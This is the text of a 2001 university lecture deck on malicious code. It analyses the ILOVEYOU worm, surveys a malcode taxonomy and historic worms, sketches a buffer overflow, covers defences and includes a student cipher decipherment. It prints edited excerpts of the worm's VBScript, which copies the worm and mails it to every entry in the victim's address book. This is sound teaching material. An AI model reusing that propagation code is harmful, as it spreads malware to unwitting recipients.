Lecture 17: Malcode David Evans CS588: Security and Privacy
advertisement
Lecture 17:
Malcode
From http://cnnfn.cnn.com/2000/10/27/technology/microsoft/
CS588: Security and Privacy
University of Virginia
Computer Science
David Evans
http://www.cs.virginia.edu/~evans
Menu
•
•
•
•
Examination of ILoveYou Code
Malicious Code Taxonomy
Beer Bottle Deciphering (Eric & Michael)
Malcode Defenses Overview
– Virus Scanners
12 Nov 2001
University of Virginia CS 588
2
LoveLetter.VBS
• Excerpts on the manifest
• This 328-line program caused ~$10B in
damage
• How much work and smarts was
required?
12 Nov 2001
University of Virginia CS 588
3
Smart people
would
rem barok -loveletter(vbe) <i hate go to school> convey more
interesting
rem by: spyder / ispyder@mail.com /
message.
@GRAMMERSoft Group / Manila,Philippines
Main Loop
On Error Resume Next
Smart virus writers
...
wscr.RegWrite "...Scripting Host\
don’t include their
Settings\Timeout", 0
contact information.
sub main()
...
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
...
This was smart – turn off
spreadtoemail()
scripting timeout in registry.
...
end sub
(Dumb for Microsoft.)
12 Nov 2001
University of Virginia CS 588
4
spreadtoemail (edited to fit)
sub spreadtoemail()
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
Smart virus writers
set male=out.CreateItem(0)
can spell “mail”.
male.Recipients.Add(malead)
male.Subject = “ILOVEYOU”
male.Body = “kindly check the attached
LOVELETTER coming from me.”
male.Attachments.Add(dirsystem&
“\LOVE-LETTER-FOR-YOU.TXT.vbs”)
male.Send
x=x+1
next
Smart virus writers
next
understand for loops.
end sub
12 Nov 2001
University of Virginia CS 588
5
12 Nov 2001
University of Virginia CS 588
6
Be Very Afraid...
• When really dumb people with no
resources write malicious programs, it
costs $10B.
• What would happen if smart people with
resources wrote a malicious program?
• See manifest links:
– Two interesting scenarios answering this
– James Gleick article
12 Nov 2001
University of Virginia CS 588
7
Attacking Malicious Code
• “Malicious Code” is a bad name
– Code has no intent
– Programmer’s intent doesn’t matter, what
the code does matters
• As networks get more programmable,
accidentally harmful code will become common
• We’ll use “malcode” (mal = bad)
– Its not a great name either...
12 Nov 2001
University of Virginia CS 588
8
Taxonomy of Code
All Code
Harmless Code
Malcode
Created by
Malicious Author
12 Nov 2001
Accidental
University of Virginia CS 588
(occasionally
programs are
actually
useful, too)
9
Taxomony of Malcode
[Stallings, p. 502]
Malcode
Requires Host
Program
Trap
Doors
Logic
Bombs
Trojan
Horses
Independent
Viruses
Insiders
12 Nov 2001
Worms
Self-Replicating
University of Virginia CS 588
10
Worms and Viruses
• People get into stupid arguments over
whether something is a “worm” or a “virus”
– Is the Internet a host program?
• See Mark W. Eichin and Jon A. Rochlis, With
Microscope and Tweezers: An Analysis of the
Internet Virus of November 1988
• Is Outlook a host program for an email?
• Similarly, for worms/viruses/Trojans
– If the user must open it (e.g., ILoveYou) it is
self-replicating?
12 Nov 2001
University of Virginia CS 588
11
Trojan Horses
• Greeks and Trojans at war
– Eris (Discord), Paris, Aphroditie, Helen
• Greeks attacking Troy, bombarded city for 10
years, but couldn’t get through city walls.
• Pretended to leave, left big wooden horse as gift
• Trojans brought horse into city (had to tear down
part of wall to do this), got silly drunk celebrating
victory.
• Greeks jumped out, killed sentries, and let in
Greek army.
12 Nov 2001
University of Virginia CS 588
12
Modern Trojan Horses
• User runs program that looks harmless
– Program pretends to be “cool, dancing bears”, also
erases your hard drive
• Most attacks today are Trojan Horses
– ILoveYou, Melissa, recent Microsoft attack, etc.
• Rely on modern humans being as dumb as
mythical Trojans
– No matter how good your city/fire walls are,
they don’t do any good if you can’t stop
users from running random code
12 Nov 2001
University of Virginia CS 588
13
Differences between
Morris Worm 1988 and
Melissa/ILoveYou 1999
12 Nov 2001
University of Virginia CS 588
14
Vulnerabilities Exploited
• Morris Worm:
– Buffer overflow: fingerd uses gets
– sendmail debug mode
– Weak Unix passwords
• Melissa:
– Word enables macros by default, no limitations on
macro behavior
• ILoveYou:
– Dumb people will run code attached to email
• Code Red/Nimda:
– Buffer overflow in IIS
12 Nov 2001
University of Virginia CS 588
15
Buffer Overflows
int i;
int k;
Frame Pointer
gets (s);
Input more than 64 bits:
gets just writes down
stack
bit 65: address
of bit 66
on stack
bits 66-...:
instructions
12 Nov 2001
...
char s[64];
Return Address
University of Virginia CS 588
16
Preventing Buffer Overflows
• Use run-time checks on all memory references
– Safe languages (CLU, Java, Eiffel, etc.)
– Safe libraries for C (don’t use gets, strcpy, etc.)
• Separate code and data segments
– Make code segment unwriteable (once application
loaded), only allow jumps in code segment
• Static analysis
– Check binary or source code
• But – about ½ of recent vulnerabilities are still
buffer overflows!
12 Nov 2001
University of Virginia CS 588
17
Replication Strategy
• Morris Worm
– Searched .forward files (should have used
.rhosts) to find other hosts to attack
– Used password guessing to break into
other accounts
– Used fingerd, sendmail vulnerabilites
• Melissa/ILoveYou
– Emails itself to entries in victim’s Outlook
address book
12 Nov 2001
University of Virginia CS 588
18
Damage
• Morris Worm
– Infected ~6000 computers (10% of Internet)
• Melissa
– Infected 1.2 Million machines in a few hours
• ILoveYou
– $10 Billion in damage
• Nimda, CodeRed
– ??
12 Nov 2001
University of Virginia CS 588
19
Outcomes
• Internet Worm (Robert Morris, Jr.)
– 3 years suspended sentence (no jail time),
$10,000 fine.
– Current occupation
• Melissa (David Smith) (~$80m damages)
– Plead guilty, Dec 1999 (second successful
prosecution of virus author), link to plea
agreement on manifest
– Hired by Rutgers as Computer Technician while
awaiting sentencing
• ILoveYou ($10B damages)
– Release without penalty, no laws in Philippines
12 Nov 2001
University of Virginia CS 588
20
• Morris Worm
Responses
– Disconnect from network
– Disorganized, phone
• Anonymous message (probably from Robert Morris)
explaining how to disable virus was not noticed or distributed
– DARPA established CERT
• Melissa
– CERT Advisory, Eradicated quickly
• But CERT had to rebuild Web server
• ILoveYou
– Many countries have since passed laws, Europe treaty
announced last week
12 Nov 2001
University of Virginia CS 588
21
Malcode Defenses
1. Prevent malcode from running
2. Limit damage it can do
3. Discourage attackers
12 Nov 2001
University of Virginia CS 588
22
Malcode Defenses
1.
Prevent malcode from running
Virus scanners – recognize known malcode
Firewalls – drop incoming packets
Code signing (only run code from trusted
sources)
Education – make users smarter
2.
Next Monday
Earlier
Your PS4’s
Limit damage it can do
Sandbox (“Playpen”) – run malcode in protected
virtual machine
Reference monitors – enforce policy on
execution
Intrusion Detection, System maintenance
3.
Today
Discourage attackers
Legal – pass laws to penalize attackers
12 Nov 2001
University of Virginia CS 588
Next Monday
Dan Ortiz
Weds
23
Deciphering Rivest’s Beer
Bottle Cipher
Michael Neve and Eric Peeters
The beer bottle cipher
12 Nov 2001
University of Virginia CS 588
25
The beer bottle cipher
99 bottles of beer on the wall,
99 bottles of beer.
Take one down,
Pass it around,
98 bottles of beer on the wall.
12 Nov 2001
University of Virginia CS 588
26
Plaintext
Represented by a number
A=01 , B=02 , … a “space”=00
Example:
BEER IS LIFE
020505180009190012090605
1 digit = 1 bottle
Here, the plaintext
has 24 bottles.
12 Nov 2001
University of Virginia CS 588
27
K bottles of beer
The wall
3
5
3
8
5
…
9
3
8
5
…
9
8
8
The wall
5
12 Nov 2001
University of Virginia CS 588
3
28
K bottles of beer
*(10*K+1)
4
1
8
8
…
4
6
5
Keep only the K rightmost digit
What could I do with
the other beers???
Bob
University of Virginia CS 588
29
???
The procedure is
complicated enough
that you probably
should not be
drinking beer when
you try to do it.
Drink it!!!!
Bob
12 Nov 2001
University of Virginia CS 588
30
Modulus
This is equivalent to write:
New_wall=old_wall*(10*K+1)mod10K
Example:
number on the wall = 537
sing "3 bottles of beer"
move left-most bottle to right end
new number on wall = 375
multiply by 31 (which is 10*3+1)
result = 11625
new number on wall = 625
12 Nov 2001
University of Virginia CS 588
31
Inverted…
Compute the multiplicative inverse for (10*K+1)mod10K
H*(10*K+1)1 mod10K
Then: New_wall*H mod 10K = old_wall
Proof:
New_wall=old_wall*(10*K+1) mod 10K
New_wall*H mod 10K= old_wall*(10*K+1)*H mod 10K
New_wall*H mod 10K= old_wall*1 mod 10K
New_wall*H mod 10K=old_wall
12 Nov 2001
University of Virginia CS 588
32
On the wall
There is an encryption key, known as the "skull".
Wall+skull
Keep only the K right most digit
New_wall=(old_wall + skull) mod 10K
Example:
number on wall = 625
sing "on the wall"
skull = 7972340074652439987611087
sum = 7972340074652439987611712
new number on wall = 712
Inverted: (abs(new_wall – skull)) mod 10K=old_wall
12 Nov 2001
University of Virginia CS 588
33
Take one down
The wall
4
1
8
…
8
4
6
The wall
4
5
The bone
1
8
8
…
4
12 Nov 2001
Don’t
drink the bone…University
yet. of Virginia CS 588
6
5
34
Pass it around
The table
2
4
5
5
7
8
3
8
8
3
t empty
(already…)
glasses on
the table
*10
+bigbone
12 Nov 2001
University of Virginia CS 588
35
Bigbone?
It’s a t+1-digit number
Each digit is the bone
The new table has t+1 digit
The table
8
7
5
4
8
1
7
4
5
8
5
Repeat all steps until the wall is empty
Ciphertext=table
12 Nov 2001
University of Virginia CS 588
36
Work with Budweiser ???
We are not sure…
12 Nov 2001
University of Virginia CS 588
37
Example
Matlab program
beer2('BUDWEISER','1654324617671695465416876154617861');
First Wall : 022104230509190518
"18 bottles of beer"
Wall : 221042305091905180
New Wall : 008657221634837580
"on the wall"
New Wall : 474074097789455441
"take one down"
Bone : 1
New Wall : 47407409778945544
"pass it around"
Big Bone : 1
10 x table : 0
New Table : 1
"17 bottles of beer"
Wall : 74074097789455444
New Wall : 66670721996880924
12 Nov 2001
University of Virginia CS 588
38
Outcomes:
Budweiser
Example
Table : 8316199728055301369
unbeer2(cipher,'1654324617671695465416876
154617861');
New Table : 731619972805530137
Bone : 9
"1 bottles of beer"
Wall : 8
New Table : 65384219502775236
Bone : 7
…
12 Nov 2001
University of Virginia CS 588
39
Virus Scanners
12 Nov 2001
University of Virginia CS 588
40
Virus Scanners
• Compare code to a database of known
malicious code
– Smart authors create self-mutating viruses
• Reasonably useful in days of “sneaker”
net (viruses spread on floppies)
• Reasonably useless when viruses
spread as fast as email
12 Nov 2001
University of Virginia CS 588
41
Virus Spreading
• Read email every hour
• Everyone’s address book contains 50
people
• Infects 300M
people in
6 hours!
350000000
300000000
250000000
200000000
150000000
100000000
50000000
0
1
2
3
4
5
6
(For more complex model, see Wang/Knight/Elder paper on manifest.)
12 Nov 2001
University of Virginia CS 588
42
Code Red
12 Nov 2001
University of Virginia CS 588
43
Code Red
12 Nov 2001
University of Virginia CS 588
44
What Virus Scanner Peddlers Do
http://security.norton.com/
12 Nov 2001
University of Virginia CS 588
45
First, it tells
you to lower
your security
settings to
allow ActiveX.
12 Nov 2001
University of Virginia CS 588
46
Always Click “Yes”
During the download, you might
see one or more messages
asking if it is OK to download
and run these programs. Click
Yes when these messages
appear.
12 Nov 2001
University of Virginia CS 588
47
12 Nov 2001
University of Virginia CS 588
48
What it Should Do
• Tell people who have ActiveX turned off,
“Good Job”
• Tell people who click “OK” to run their
scanner (which accesses every byte on
their disk) without checking its certificate
that they are very vulnerable and
should get an education!
12 Nov 2001
University of Virginia CS 588
49
Malcode Summary
• Best defense is education
• Next best defense is a good offense
– Tough legal penalties for convicted attackers
– Doesn’t work against motivated foreign
governments
• Some Technical defenses next Monday
– Virus Scanners
– Firewalls, Intrusion Detection
– Reference Monitors, Proof-Carrying Code
12 Nov 2001
University of Virginia CS 588
50
•
•
•
•
•
Charge
Keep cracking on your projects!
Read the Napster case law
Go forth and educate!
Wednesday: Dan Ortiz, Law School
Monday: Malicious code countermeasures
12 Nov 2001
University of Virginia CS 588
51
